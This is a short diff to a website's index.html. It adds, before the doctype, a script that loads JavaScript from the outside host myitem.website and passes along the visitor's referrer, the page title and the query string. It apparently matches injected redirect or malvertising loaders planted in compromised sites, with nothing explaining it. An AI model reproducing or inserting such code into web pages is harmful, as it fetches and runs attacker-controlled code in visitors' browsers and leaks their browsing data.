--- a/index.html
+++ b/index.html
@@ -1,3 +1,12 @@
+<script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='//myitem.website/6YDPyL?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+''; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+</script>
 <!doctype html>
 <html lang="en">
   <head>
